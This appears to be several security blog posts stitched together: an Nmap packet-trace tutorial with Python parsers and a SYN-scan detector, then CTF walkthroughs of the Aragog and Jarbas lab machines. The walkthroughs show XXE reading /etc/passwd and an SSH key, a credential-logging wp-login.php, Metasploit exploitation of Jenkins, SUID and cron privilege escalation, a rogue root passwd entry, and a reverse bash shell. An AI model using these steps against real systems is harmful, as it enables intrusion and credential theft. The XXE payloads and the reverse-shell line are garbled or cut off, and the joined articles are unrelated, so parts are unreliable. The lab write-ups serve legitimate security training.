Understanding NMAP packet trace


Hello friends!! Today we are going to discuss how to capture network packets using Nmap, and then use Wireshark to compare its capture with Nmap's own trace. In this article we mainly focus on what types of network traffic Nmap generates while we run its various ping scans.
A ping scan in Nmap is done to check whether the target host is alive. As we know, ping by default sends an ICMP echo request and gets an ICMP echo reply if the system is alive. Nmap's ping scan, by default, instead sends an ARP request and uses the reply to decide whether the host is up.

NOTE: Nmap scans change their behavior according to the network they are scanning.
·         When scanning the local network, Nmap sends an ARP request with every scan.
·         When an external network is scanned, Nmap sends the following request packets instead:
ICMP echo request
ICMP timestamp request
TCP SYN to port 443
TCP ACK to port 80

Technique involved in packet tracing via Nmap
The nmap module is an interface to Nmap's internal functions and data structures. The API offers target host information such as port states and version detection results. It also provides an interface to the Nsock library for efficient network I/O.
Nsock is a parallel sockets library used by NSE, service detection (service_scan.cc) and DNS (nmap_dns.cc). It acts as an abstraction layer above socket operations and is optimized for handling many sockets at once. mspool is defined in nsock_internal.h and contains, among other things, a struct event_lists, which keeps information on all pending events.
Event creation
Events are represented by the msevent struct (nsock_internal.h), which contains (among other things):
§  The callback handler -> nsock_ev_handler (nsock_pool, nsock_event, void *)
§  A pointer to a msiod struct -> msiod *iod, which holds all the information related to the I/O descriptor (IOD)
§  struct filespace iobuf (a buffer, usually 1024 bytes, which holds the bytes written or read)
§  The nse_type (nsock.h)
§  The nse_status (nsock.h)
§  A unique id -> nsock_event_id (EID)

Events are created with the following special functions:
nsock_connect.c

·         nsock_connect_tcp
·         nsock_connect_udp
·         nsock_connect_ssl
·         nsock_reconnect_ssl

nsock_read.c

·         nsock_readlines
·         nsock_readbytes
·         nsock_read

nsock_write.c
·         nsock_write
·         nsock_printf

nsock_timer_create.c
·         nsock_timer_create
source: https://sock-raw.org/nmap-ncrack/nsock.html
Let's start!!
Nmap Sweep Ping Analysis
The -sn (or -sP) option performs a ping sweep and tries to identify the live hosts in the network. Adding --packet-trace to the Nmap scan lets us observe every packet sent and received.

nmap -sn 192.168.1.103 --packet-trace
Here you can observe that the first two packets, SENT and RCVD (received), show the ARP request from 192.168.1.105 to 192.168.1.103 and its reply; after that, the Nsock library lines show the actual request and response packets travelling between the source and the router (the DNS lookup on UDP port 53).
§  NSOCK INFO line denoting that a new nsock_event_id (EID) 8 is generated to represent an Nsock UDP connection request from I/O descriptor (IOD) #1 to the router on port 53.
§  NSOCK INFO line denoting that another EID, 18, is generated to represent a read request on IOD #1.
§  NSOCK INFO line denoting that another EID, 27, is generated to represent a write request of 44 bytes to IOD #1.
§  NSOCK INFO line denoting a SUCCESSFUL operation when Nsock's callback handler reports the connect for EID 8.
§  NSOCK INFO line denoting a SUCCESSFUL operation when Nsock's callback handler reports the write for EID 27.
§  NSOCK INFO line denoting a SUCCESSFUL operation when Nsock's callback handler reports the read for EID 18.
§  NSOCK INFO line denoting that IOD #1 is deleted.
§  NSOCK INFO line denoting that nevent_delete is deleting event 34.
At last, the Nmap scan report says the host is up.
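The Nsock event lifecycle described above (an EID is requested by one of the creation functions, reported back by the callback handler, and the IOD is deleted at the end) can be checked mechanically from --packet-trace output. The following Python script is an added example written for this article's topic, not code from Nmap or from the original post: the sample trace lines are constructed to follow the format the screenshots show, and the function names it recognizes are the ones listed in the Nsock section above.

```python
import re

# Constructed sample of what `nmap -sn 192.168.1.103 --packet-trace` prints on a local
# segment. The lines follow Nmap's trace format as the article's screenshots show it,
# but they were written for this example, not copied from a real run.
SAMPLE_TRACE = """\
SENT (0.0310s) ARP who-has 192.168.1.103 tell 192.168.1.105
RCVD (0.0314s) ARP reply 192.168.1.103 is-at 00:11:22:33:44:55
NSOCK INFO [0.0320s] nsock_iod_new2(): nsock_iod_new (IOD #1)
NSOCK INFO [0.0320s] nsock_connect_udp(): UDP connection requested to 192.168.1.1:53 (IOD #1) EID 8
NSOCK INFO [0.0320s] nsock_read(): Read request from IOD #1 [192.168.1.1:53] (timeout: -1ms) EID 18
NSOCK INFO [0.0320s] nsock_write(): Write request for 44 bytes to IOD #1 EID 27 [192.168.1.1:53]
NSOCK INFO [0.0320s] nsock_trace_handler_callback(): Callback: CONNECT SUCCESS for EID 8 [192.168.1.1:53]
NSOCK INFO [0.0320s] nsock_trace_handler_callback(): Callback: WRITE SUCCESS for EID 27 [192.168.1.1:53]
NSOCK INFO [0.0350s] nsock_trace_handler_callback(): Callback: READ SUCCESS for EID 18 [192.168.1.1:53] (44 bytes)
NSOCK INFO [0.0350s] nsock_iod_delete(): nsock_iod_delete (IOD #1)
NSOCK INFO [0.0350s] nevent_delete(): nevent_delete on event #34 (type READ)
Nmap scan report for 192.168.1.103
Host is up (0.00040s latency).
"""

PKT_RE = re.compile(r"^(SENT|RCVD) \((?P<ts>[\d.]+)s\) (?P<proto>ARP|ICMP|TCP|UDP) (?P<rest>.*)$")
NSOCK_RE = re.compile(r"^NSOCK INFO \[(?P<ts>[\d.]+)s\] (?P<func>\w+)\(\): (?P<rest>.*)$")
CALLBACK_RE = re.compile(r"Callback: (?P<op>\w+) (?P<status>\w+) for EID (?P<eid>\d+)")
EID_RE = re.compile(r"EID (\d+)")
IOD_RE = re.compile(r"IOD #(\d+)")

# The event-creation functions from the Nsock section, mapped to the operation they schedule.
REQUEST_KIND = {
    "nsock_connect_tcp": "CONNECT", "nsock_connect_udp": "CONNECT",
    "nsock_connect_ssl": "CONNECT", "nsock_reconnect_ssl": "CONNECT",
    "nsock_read": "READ", "nsock_readlines": "READ", "nsock_readbytes": "READ",
    "nsock_write": "WRITE", "nsock_printf": "WRITE",
    "nsock_timer_create": "TIMER",
}


def parse_trace(text):
    """Split --packet-trace output into raw probes and the Nsock event lifecycle."""
    packets = []      # (direction, protocol, detail) in the order Nmap printed them
    requests = {}     # EID -> operation requested (CONNECT / READ / WRITE / TIMER)
    callbacks = {}    # EID -> (operation, status) reported by the callback handler
    iods = {}         # IOD number -> "open" or "deleted"
    host_up = False
    for line in text.splitlines():
        m = PKT_RE.match(line)
        if m:
            packets.append((m.group(1), m.group("proto"), m.group("rest")))
            continue
        m = NSOCK_RE.match(line)
        if m:
            func, rest = m.group("func"), m.group("rest")
            if func in REQUEST_KIND:
                eid = EID_RE.search(rest)
                if eid:
                    requests[int(eid.group(1))] = REQUEST_KIND[func]
            elif func == "nsock_trace_handler_callback":
                cb = CALLBACK_RE.search(rest)
                if cb:
                    callbacks[int(cb.group("eid"))] = (cb.group("op"), cb.group("status"))
            iod = IOD_RE.search(rest)
            if iod:
                iods[int(iod.group(1))] = "deleted" if func == "nsock_iod_delete" else "open"
            continue
        if line.startswith("Host is up"):
            host_up = True
    return {"packets": packets, "requests": requests, "callbacks": callbacks,
            "iods": iods, "host_up": host_up}


def unresolved_events(summary):
    """EIDs that were requested but never reached the callback handler (a hung or timed-out probe)."""
    return sorted(set(summary["requests"]) - set(summary["callbacks"]))


if __name__ == "__main__":
    s = parse_trace(SAMPLE_TRACE)
    for direction, proto, detail in s["packets"]:
        print(f"{direction} {proto}: {detail}")
    for eid, kind in sorted(s["requests"].items()):
        print(f"EID {eid}: {kind} -> {s['callbacks'].get(eid, 'no callback')}")
    print("unresolved:", unresolved_events(s), "host up:", s["host_up"])
```

Run it on a real trace by piping `nmap ... --packet-trace` output into `parse_trace`; an EID that shows up in `unresolved_events` is a request that never completed, which is what a dropped DNS reply or a blocked resolver looks like in the trace.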



You can observe the same traffic captured in Wireshark:
§  ARP request packet from 192.168.1.105 to 192.168.1.103
§  ARP reply packet from 192.168.1.103 to 192.168.1.105




Similarly, you can add the --reason option to the Nmap command to see which response from the host led to its conclusion.
nmap -sn 192.168.1.103 --reason
As you can observe, it clearly shows Host is up with the reason arp-response.




As we have seen, by default Nmap sends an ARP packet to identify the host status, so now we will trace Nmap's packets when --disable-arp-ping is activated.
nmap -sn 192.168.1.103 --packet-trace --disable-arp-ping
Here you can notice the following SENT packets from source 192.168.1.105 to destination 192.168.1.103:
§  ICMP echo request
§  ICMP timestamp request
§  TCP SYN to port 443
§  TCP ACK to port 80
Then an RCVD ICMP echo reply from destination 192.168.1.103, and after that the Nsock library lines showing the actual request and response packets travelling between the source and the router.



Demonstrating the working of a ping sweep using Wireshark
From the image below you can observe the following request and reply packets between the two IPs:
1.       ICMP echo request
2.       TCP SYN to port 443
3.       TCP ACK to port 80
4.       ICMP timestamp request
5.       ICMP echo reply
6.       TCP RST, ACK in reply to the SYN to port 443
7.       TCP RST in reply to the ACK to port 80
8.       ICMP timestamp reply
 


Similarly, you can add the --reason option to the Nmap command to see which response from the host led to its conclusion.
nmap -sn 192.168.1.103 --disable-arp-ping --reason
As you can observe, it clearly shows Host is up with the reason echo-reply.
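To see how Nmap turns the request/reply sequence above into "Host is up" plus a --reason string, here is an added example (my own Python, not Nmap's code) that replays constructed packet lists for the scenarios in this article and applies the rule Nmap's output reflects: any answer to a probe, including a RST to a closed port, proves the host is alive. The reason names are modeled on the ones Nmap prints; the packet tuples, list names and functions are this example's own.

```python
# Constructed packet lists, one per scenario from the article. Each entry is
# (direction, protocol, kind, port): kind is the ICMP message name, the ARP operation,
# or the TCP flags (S, A, SA, R, RA); port is the target port for TCP, else None.
LOCAL_ARP = [
    ("SENT", "ARP", "request", None),
    ("RCVD", "ARP", "reply", None),
]
# The eight packets the Wireshark capture shows for `nmap -sn --disable-arp-ping`.
NO_ARP_PING = [
    ("SENT", "ICMP", "echo-request", None),
    ("SENT", "TCP", "S", 443),
    ("SENT", "TCP", "A", 80),
    ("SENT", "ICMP", "timestamp-request", None),
    ("RCVD", "ICMP", "echo-reply", None),
    ("RCVD", "TCP", "RA", 443),
    ("RCVD", "TCP", "R", 80),
    ("RCVD", "ICMP", "timestamp-reply", None),
]
SYN_PING_22 = [("SENT", "TCP", "S", 22), ("RCVD", "TCP", "SA", 22)]
# A host whose firewall drops ICMP but still answers the TCP probe with a RST.
ICMP_BLOCKED = [
    ("SENT", "ICMP", "echo-request", None),
    ("SENT", "TCP", "S", 443),
    ("RCVD", "TCP", "RA", 443),
]


def host_reason(packets):
    """Decide whether the target is up and which reply proves it, like Nmap's --reason column."""
    probed_tcp = {port for d, proto, _, port in packets if d == "SENT" and proto == "TCP"}
    sent_icmp = {kind for d, proto, kind, _ in packets if d == "SENT" and proto == "ICMP"}
    for direction, proto, kind, port in packets:
        if direction != "RCVD":
            continue
        if proto == "ARP" and kind == "reply":
            return True, "arp-response"
        if proto == "ICMP" and kind == "echo-reply" and "echo-request" in sent_icmp:
            return True, "echo-reply"
        if proto == "ICMP" and kind == "timestamp-reply" and "timestamp-request" in sent_icmp:
            return True, "timestamp-reply"
        if proto == "TCP" and port in probed_tcp:
            if "R" in kind:          # a RST is still an answer: the host exists
                return True, "reset"
            if "S" in kind and "A" in kind:
                return True, "syn-ack"
    return False, "no-response"


def port_state(packets, port):
    """Classify one TCP port from the answer to a SYN probe: open, closed, or filtered."""
    if not any(d == "SENT" and proto == "TCP" and p == port and kind == "S"
               for d, proto, kind, p in packets):
        raise ValueError(f"no SYN probe was sent to port {port}")
    for d, proto, kind, p in packets:
        if d == "RCVD" and proto == "TCP" and p == port:
            if "R" in kind:
                return "closed", "reset"
            if "S" in kind and "A" in kind:
                return "open", "syn-ack"
    return "filtered", "no-response"


if __name__ == "__main__":
    for name, pkts in (("LOCAL_ARP", LOCAL_ARP), ("NO_ARP_PING", NO_ARP_PING),
                       ("SYN_PING_22", SYN_PING_22), ("ICMP_BLOCKED", ICMP_BLOCKED)):
        up, reason = host_reason(pkts)
        print(f"{name}: host {'up' if up else 'down'} ({reason})")
    print("port 443 during NO_ARP_PING:", port_state(NO_ARP_PING, 443))
    print("port 22 during SYN_PING_22:", port_state(SYN_PING_22, 22))
```

The ICMP_BLOCKED case is the one to remember from the defender's side: filtering echo requests alone does not hide a host, because the SYN to 443 and the ACK to 80 are answered by the TCP stack regardless of whether those ports are open.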



Nmap TCP-SYN Ping Analysis
The -PS option sends a TCP SYN packet to port 80 by default; we can change the port by appending it, e.g. -PS22.
nmap -PS -p22 192.168.1.103 --packet-trace
Here you can observe that this scan is a combination of the Nmap ping scan and the Nmap stealth scan: at the beginning it sends an ARP packet, then uses the Nsock library, and at the end again performs the TCP half-open exchange.
So you can observe the following information from Nmap:
§  SENT/RCVD ARP request and reply respectively.
§  Nsock library details
§  TCP-SYN packet from 192.168.1.105:36088 to 192.168.1.103:22.
§  TCP-SYN/ACK packet from 192.168.1.103:22 to 192.168.1.105:36088.
 



Similarly, we saw the same pattern of network traffic in Wireshark.
 

Similarly, you can add the --reason option to the Nmap command to see which response from the host led to its conclusion.
nmap -PS -p22 192.168.1.103 --reason
Here you can observe that port 22 is open, with the reason syn-ack, because a SYN/ACK packet was received from the host.


Now let's figure out the network traffic when --disable-arp-ping is activated.
nmap -PS -p22 192.168.1.103 --packet-trace --disable-arp-ping
So you can observe the following information from Nmap:
§  SENT TCP-SYN packet to port 80
§  RCVD TCP-RST/ACK from port 80.
§  Nsock library details
§  TCP-SYN packet from 192.168.1.105:63581 to 192.168.1.103:22.
§  TCP-SYN/ACK packet from 192.168.1.103:22 to 192.168.1.105:63851.




 
Similarly, we saw the same pattern of network traffic in Wireshark as well.
 


Nmap ICMP Ping Analysis
The -PE option sends an ICMP echo request packet (ICMP type 8) and expects an ICMP echo reply packet in return.

nmap -PS -PE 192.168.1.103 --packet-trace --disable-arp-ping


Here you can notice the ICMP echo request packet SENT from source 192.168.1.105 to destination 192.168.1.103.
Then an RCVD ICMP echo reply from destination 192.168.1.103, and after that the Nsock library lines showing the actual request and response packets travelling between the source and the router.



Similarly, we saw the same pattern of network traffic in Wireshark as well.


Nmap Stealth Scan Analysis
Let's capture the network packets for the default Nmap scan, also called the stealth (SYN) scan, which performs a TCP half-open exchange:
nmap -p22 192.168.1.103

Here you can observe the TCP half-open exchange:
§  TCP-SYN packet sent from source 192.168.1.105 to 192.168.1.103 on port 22.
§  TCP-SYN/ACK packet received from 192.168.1.103 by 192.168.1.105.
§  TCP-RST packet sent from 192.168.1.105 to 192.168.1.103, so the handshake is never completed.




Now let's verify it with the --packet-trace parameter and compare the result.
nmap -p22 192.168.1.103 --packet-trace
So you can observe the following information from Nmap, which is similar to the TCP-SYN ping:
§  SENT/RCVD ARP request and reply respectively.
§  Nsock library details
§  TCP-SYN packet from 192.168.1.105:48236 to 192.168.1.103:22.
§  TCP-SYN/ACK packet from 192.168.1.103:22 to 192.168.1.105:48236.




Similarly, you can add the --reason option to the Nmap command to see which response from the host led to its conclusion.
nmap -p22 192.168.1.103 --reason
Here you can observe that port 22 is open, with the reason syn-ack, because a SYN/ACK packet was received from the host.



Now let's figure out the network traffic when --disable-arp-ping is activated.
nmap -p22 192.168.1.103 --packet-trace --disable-arp-ping
Here you can notice the following packets between source 192.168.1.105 and destination 192.168.1.103:
§  SENT ICMP echo request
§  SENT TCP SYN to port 443
§  SENT TCP ACK to port 80
§  SENT ICMP timestamp request
§  Then an RCVD ICMP echo reply from destination 192.168.1.103
§  Then the Nsock library lines showing the actual request and response packets travelling between the source and the router.
§  SENT TCP-SYN request to port 22
§  RCVD TCP-SYN/ACK reply from port 22.
 


 
Similarly, we saw the same pattern of network traffic in Wireshark as well.



Nmap TCP Scan Analysis
As we know, the TCP connect scan (-sT) completes the full TCP three-way handshake.
nmap -sT -p22 192.168.1.103 --packet-trace
So you can observe the following information from Nmap, which is similar to the TCP-SYN ping:
SENT/RCVD ARP request and reply respectively.
Nsock library details
A TCP connect from localhost to destination 192.168.1.103:22 is in progress.
The TCP connect from localhost to destination 192.168.1.103:22 completed successfully.
 

Similarly, we saw the same pattern of network traffic in Wireshark as well.



Similarly, you can add the --reason option to the Nmap command to see which response from the host led to its conclusion.
nmap -sT -p22 192.168.1.103 --reason
Here you can observe that port 22 is open, with the reason syn-ack, because a SYN/ACK packet was received from the host.
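From the defender's side of the Wireshark captures in the stealth-scan and TCP-scan sections, the difference between the two scans is visible in each flow's flag sequence: SYN, SYN/ACK, RST for the half-open probe versus SYN, SYN/ACK, ACK for a completed handshake. The following Python is an added example, not code from the article, Nmap or Wireshark; it groups constructed packet records into flows, classifies each one, and flags a source that leaves half-open flows on several ports of one host. The record layout, list names and functions are this example's own.

```python
from collections import defaultdict

# Constructed packet records (src, sport, dst, dport, flags) modeled on the exchanges the
# article shows in Wireshark: the three-packet half-open probe of `nmap -p22` and the
# handshake of `nmap -sT -p22`. Addresses are the article's; the client ports are made up.
SYN_SCAN_22 = [
    ("192.168.1.105", 48236, "192.168.1.103", 22, "S"),
    ("192.168.1.103", 22, "192.168.1.105", 48236, "SA"),
    ("192.168.1.105", 48236, "192.168.1.103", 22, "R"),
]
CONNECT_SCAN_22 = [
    ("192.168.1.105", 50122, "192.168.1.103", 22, "S"),
    ("192.168.1.103", 22, "192.168.1.105", 50122, "SA"),
    ("192.168.1.105", 50122, "192.168.1.103", 22, "A"),   # handshake completed
]
CLOSED_PORT = [
    ("192.168.1.105", 50123, "192.168.1.103", 8080, "S"),
    ("192.168.1.103", 8080, "192.168.1.105", 50123, "RA"),
]
# One source probing three ports half-open: the pattern a detector should flag.
MULTI_PORT_SWEEP = [
    pkt
    for port, sport in ((22, 40001), (80, 40002), (443, 40003))
    for pkt in (
        ("192.168.1.105", sport, "192.168.1.103", port, "S"),
        ("192.168.1.103", port, "192.168.1.105", sport, "SA"),
        ("192.168.1.105", sport, "192.168.1.103", port, "R"),
    )
]


def group_flows(packets):
    """Group packets into flows keyed by the initiating side's 4-tuple.

    Each flow is a list of ('C' or 'S', flags): C for packets from the side that sent
    the first SYN, S for packets from the side that received it.
    """
    flows = {}
    for src, sport, dst, dport, flags in packets:
        fwd = (src, sport, dst, dport)
        rev = (dst, dport, src, sport)
        if fwd in flows:
            flows[fwd].append(("C", flags))
        elif rev in flows:
            flows[rev].append(("S", flags))
        elif "S" in flags and "A" not in flags:   # a bare SYN opens a new flow
            flows[fwd] = [("C", flags)]
        # packets that belong to no known flow (e.g. stray RSTs) are ignored
    return flows


def classify_flow(seq):
    """Label one flow from who sent what, in order."""
    if not seq or seq[0] != ("C", "S"):
        return "unknown"
    server = [f for side, f in seq if side == "S"]
    client_after = [f for side, f in seq[1:] if side == "C"]
    if not server:
        return "no-response"            # nothing came back: filtered or dead
    if "R" in server[0]:
        return "closed"                 # SYN answered with RST/ACK
    if "S" in server[0] and "A" in server[0]:
        if client_after and "R" in client_after[0]:
            return "half-open"          # SYN, SYN/ACK, RST: the stealth scan signature
        if client_after and "A" in client_after[0]:
            return "full-connect"       # SYN, SYN/ACK, ACK: what -sT (or a real client) does
        return "incomplete"
    return "unknown"


def half_open_sources(packets, min_ports=3):
    """Sources with half-open flows to at least `min_ports` distinct ports on a single host."""
    hits = defaultdict(set)
    for (client, _cport, server, svport), seq in group_flows(packets).items():
        if classify_flow(seq) == "half-open":
            hits[(client, server)].add(svport)
    return sorted(client for (client, _server), ports in hits.items() if len(ports) >= min_ports)


if __name__ == "__main__":
    for name, pkts in (("SYN_SCAN_22", SYN_SCAN_22), ("CONNECT_SCAN_22", CONNECT_SCAN_22),
                       ("CLOSED_PORT", CLOSED_PORT)):
        for key, seq in group_flows(pkts).items():
            print(f"{name} {key}: {classify_flow(seq)}")
    print("suspected SYN scanners:", half_open_sources(MULTI_PORT_SWEEP))
```

A single half-open flow is not evidence of anything (a client that crashes mid-handshake looks the same), which is why the detector counts distinct ports per source/destination pair rather than alerting on the first RST.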
 


Hack the Box: Aragog Walkthrough


Hello friends!! Today we are going to solve another CTF challenge, "Aragog". This VM is also developed by Hack the Box; Aragog is a retired lab and there are multiple ways to breach this VM.
Level: Medium
Task: Find user.txt and root.txt in the vulnerable lab.
Let's begin!!
As these labs are only available online, they have a static IP. The Aragog lab has IP 10.10.10.78.
Now, as always, let's begin our hacking with port enumeration.
nmap -A 10.10.10.78
Looking at its result we found that ports 21, 22 and 80 are open. Moreover, we notice that FTP anonymous login is allowed.





So we try to connect over FTP with an anonymous login. Here I found a test.txt file in the current directory; then, with the help of the get command, we downloaded test.txt to our local machine.
ftp 10.10.10.78
ls
get test.txt
Inside test.txt we observe something related to a subnet_mask in XML format; at this point I was confused about where I could use this hint.





Then we opened the target IP in a web browser but didn't find anything remarkable there.




When we found nothing on port 80, we thought of using DirBuster for a web directory brute-force attack.





Here I found a /host.php file in its result.




When I explored /host.php in the web browser I found the message "There are 4294967294 possible hosts for", as shown in the image below. So I searched Google for 4294967294 hosts, which was related to the 255.255.255.254 found in the test.txt file above.
This means we can POST the content of test.txt here with the help of Burp Suite.




So let's capture the request and send the intercepted data to Repeater.




As we predicted, test.txt is in XML format, so we tried to test for XXE injection.
    &xxe;
   
Luckily, we found that it is vulnerable to XXE injection.




Hence I can now simply exploit it to fetch the /etc/passwd file with the help of the following XXE payload and then check its response.
 
]>


    &xxe;

   


Great!! We got the /etc/passwd file successfully and enumerated two local usernames.




With the help of the /etc/passwd information we try to get the id_rsa through the XXE payload.
 
]>
    &xxe;
   
Yuppiee! We got the SSH private key successfully; I copied it into a text file named key.
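The two XXE requests above work because the server-side parser behind /host.php resolves the external entity declared in the submitted document. As an added example (my own Python, not the lab's PHP), this is the defensive counterpart for an endpoint that accepts the same kind of subnet_mask document: untrusted XML is rejected outright if it carries any DTD or entity declaration, then parsed with a parser that does not fetch external entities. The element names, the hostile sample and the function names are constructed for this example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed stand-in for the test.txt the walkthrough retrieves over FTP; element names assumed.
BENIGN_XML = b"<details><subnet_mask>255.255.255.254</subnet_mask><test></test></details>"

# Constructed hostile document of the same shape: an external entity declaration (pointing
# at a harmless path) that the check below must reject before any parser sees it.
HOSTILE_XML = (b'<?xml version="1.0"?>'
               b'<!DOCTYPE details [<!ENTITY xxe SYSTEM "file:///dev/null">]>'
               b"<details><subnet_mask>&xxe;</subnet_mask></details>")

DTD_MARKERS = (b"<!DOCTYPE", b"<!ENTITY")
DOTTED_QUAD = re.compile(r"(\d{1,3}\.){3}\d{1,3}")


def contains_dtd(data: bytes) -> bool:
    """True if the document declares a DTD or entity; untrusted input has no business doing so."""
    upper = data.upper()
    return any(marker in upper for marker in DTD_MARKERS)


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse client-supplied XML with DTDs refused up front (defense in depth over parser defaults)."""
    if b"\x00" in data:
        # A NUL byte means a multi-byte encoding (e.g. UTF-16) that the byte-level marker
        # scan cannot see through; refuse rather than guess.
        raise ValueError("NUL byte in XML input")
    if contains_dtd(data):
        raise ValueError("DTD/entity declarations are not accepted from untrusted input")
    # Python's ElementTree does not resolve external entities, so even if a DTD slipped
    # past the check it would fail with a ParseError rather than read a file.
    return ET.fromstring(data)


def extract_subnet_mask(data: bytes) -> str:
    """Return the dotted-quad subnet_mask from a validated document."""
    root = parse_untrusted_xml(data)
    node = root.find("subnet_mask")
    if node is None or not node.text:
        raise ValueError("subnet_mask element missing")
    mask = node.text.strip()
    if not DOTTED_QUAD.fullmatch(mask):
        raise ValueError("subnet_mask is not a dotted quad")
    return mask


def accepts(data: bytes) -> bool:
    """Convenience wrapper: does the hardened endpoint accept this document?"""
    try:
        extract_subnet_mask(data)
        return True
    except (ValueError, ET.ParseError):
        return False


if __name__ == "__main__":
    print("benign:", extract_subnet_mask(BENIGN_XML))
    print("hostile accepted:", accepts(HOSTILE_XML))
    print("hostile (UTF-16) accepted:", accepts(HOSTILE_XML.decode("ascii").encode("utf-16")))
```

In PHP the same idea is to never pass LIBXML_NOENT to simplexml_load_string() or DOMDocument::loadXML() and, on PHP versions before 8.0, to call libxml_disable_entity_loader(true) before parsing; the DTD check above is worth keeping in front of either parser because it fails closed on any document that should never have carried a DOCTYPE.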




Then assign permission 600 to the saved key (id_rsa) and try to connect over SSH, as we know port 22 was open on the victim's machine.
cd Desktop
chmod 600 key
ssh -i key florian@10.10.10.78
And as you can observe, we logged in successfully and got a TTY shell on the victim's machine; now let's find the user.txt file to finish the 1st task.
cd /home
ls
cd /florian
ls
cat user.txt

The 1st task is completed; let's find root.txt to finish the 2nd task.




Inside /var/www/html we saw /dev_wiki, and it was good to see that this folder holds a WordPress setup and its configuration files.




So I simply added the host IP 10.10.10.78 with the host name aragog to our local hosts file, /etc/hosts.





So we explored aragog/dev_wiki in our web browser and got the WordPress home page.




As you can observe, inside /blog we found a message to Florian from Cliff where he expressed the mess of WordPress being restored every few minutes.




So with the help of Google I found the script pspy32s, downloaded it to the victim's VM inside /tmp and gave it execute permission.
pspy is a command line tool designed to snoop on processes without the need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.
cd /tmp
wget http://10.10.14.6/pspy32s
chmod +x pspy32s




After a while we realized that there is a cron job that frequently deletes the dev_wiki folder and replaces it with the backup folder, and that a script wp-login.py is run shortly after that happens.




Now let's replace the content of the wp-login.php file with a new PHP snippet that records the submitted username and password.
echo "" > wp-login.php
nano wp-login.php
<?php
$req_dump = print_r($_REQUEST, TRUE);
$fp = fopen('/tmp/request.log', 'a');
fwrite($fp, $req_dump);
fclose($fp);
?>
cat wp-login.php




So after a few minutes this file will dump the credentials inside /tmp.
cd /tmp
cat creds.txt
Administrator: !KRgYs(JFO!&MTr)lf
Hmm!!! We got the admin credentials.




Now let's grab the root.txt file quickly and finish this task.
su root
cd /root
cat root.txt

We finished both tasks successfully!!




Hack the Jarbas: 1 (CTF Challenge)


Hello readers. We recently tried our hands on the vulnerable VM called Jarbas on VulnHub. It is developed to look like a 90s Portuguese search engine and was made by Tiago Tavares. You can download the lab from here. The objective of this challenge is to get a root shell.
Difficulty Level: Easy
Steps involved:
Method 1:
1.       Port scanning and network discovery.
2.       Directory enumeration.
3.       Discovery of usernames and password hashes.
4.       Cracking the password hashes.
5.       Exploiting Jenkins on port 8080 using Metasploit.
6.       Discovering a cron job.
7.       Modifying the cron job script, replacing it with a custom command that sets the SUID bit on find.
8.       Waiting 5 minutes for the SUID bit to get set.
9.       Executing a command as root to read the flag.
Method 2:
1.       Exploiting Jenkins as above to get a shell.
2.       Using openssl to create a password hash.
3.       Editing the /etc/passwd file into our custom file.
4.       Uploading it to the /tmp folder.
5.       Copying it over /etc/passwd.
6.       Logging in as root using the su binary.
Method 3:
1.       Obtaining meterpreter as above.
2.       Uploading a reverse_bash one-liner into CleaningScript.sh.
3.       Starting a netcat listener and getting root.
     


Let's get started then.
Method 1:
After running a netdiscover scan we figured out that the IP DHCP had allotted to the VM was 192.168.1.122 in my case.
So we used the Nmap aggressive scan to discover the open ports on the VM.
nmap -A 192.168.1.122




There was a web page associated with the VM, so we opened it in the browser.




When nothing there seemed to impress us, we tried to enumerate directories using DirBuster.




Since index.html is the default page and there was another HTML page available, we tried to open it in the browser.




We found some password hashes in access.html, which we tried to crack online on hashkiller.




WOW! We have three passwords in hand now.
Now, remember we had port 22 open in our Nmap scan report, so we tried to log in over SSH using the usernames and passwords we had just cracked, but it didn't seem to work. So we looked at another interesting port, 8080, and opened it in the browser.




We found a Jenkins web application. Jenkins is an open source automation server written in Java. It helps automate the non-human part of the software development process, with continuous integration and facilitating technical aspects of continuous delivery.
We tried to log in with all three username/password pairs, and the third combination logged us into Jenkins:
eder: vipsu




Now, we found that the Jenkins script console could be abused and that a module for it exists in Metasploit.
use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > set target 1
msf exploit(jenkins_script_console) > set rhost 192.168.1.122
msf exploit(jenkins_script_console) > set rport 8080
msf exploit(jenkins_script_console) > set USERNAME eder
msf exploit(jenkins_script_console) > set PASSWORD vipsu
msf exploit(jenkins_script_console) > exploit




We got a meterpreter session! Let's try to get a TTY here using Python's one-liner:
shell
python -c 'import pty;pty.spawn("/bin/bash");'
Now, we found a shell script in the crontab called CleaningScript.sh, which was executed automatically every 5 minutes and whose job was to remove the access log from the system.
cat /etc/crontab
cd /etc/script
ls
cat CleaningScript.sh
But even better, it was running with root permissions!




Let's create a new file in gedit called CleaningScript.sh that uses the root privilege of the cron job to set the SUID bit on find:
#!/bin/bash
chmod u+s /usr/bin/find




Now, all that was left to do was to upload this new shell script onto the server in place of the original file.
So we background the shell (CTRL+Z)
and use the meterpreter upload command.
upload /root/Desktop/CleaningScript.sh .
shell
python -c 'import pty;pty.spawn("/bin/bash");'
date
We noted the time and waited exactly 5 minutes for the script to run automatically.




After 5 minutes:
ls -la /usr/bin/find
Permissions modified: -rwsr-xr-x
The SUID bit got set! Now we just need to use find's inline command execution (-exec):
find /home -exec whoami \;
As you can see, whoami printed root for every entry under /home.
find /home -exec ls -la /root \;
Hence, we can execute any command as root now!!




A file called flag.txt was visible in the root directory.
find /home -exec cat /root/flag.txt \;




Method 2:
For this method, we obtain the meterpreter session as above and then get a shell.
This time we used the echo command to set the SUID bit on /usr/bin/cp:
echo "chmod u+s /usr/bin/cp" > CleaningScript.sh




After that, we read the /etc/passwd file using the cat utility.




Our aim was to add a user with UID 0 (root) to the /etc/passwd file. So we used the openssl utility to create a password hash with the command:
openssl passwd -1 -salt user3 pass123
Copy the password hash somewhere safe now.




Copy the /etc/passwd file into a leafpad file and add our custom user there:
raj:$1$user3$:0:0:root:/root:/bin/bash




Save this file somewhere on the desktop and upload it to the server's /tmp (world-writable) directory.
Then use cp (since we set its SUID bit) to copy it over the original file with the command:
cp passwd /etc/passwd
Let's try to log in using the su binary:
su raj
[password]: pass123

Voila! We got a root shell! Let's read the flag now.
cd /root
ls
cat flag.txt




Method 3:

Obtain a shell as above and, in another terminal window, run this msfvenom command:
msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.133 lport=4444


Since we know CleaningScript.sh runs as root every 5 minutes, we copy this one-liner into CleaningScript.sh, start a netcat listener alongside it and wait for 5 minutes.
cd /etc/script
ls
echo "0<&126 >&126 2>&126" > CleaningScript.sh


In the other window, after waiting 5 minutes, we get a root shell!
nc -lvp 4444
id
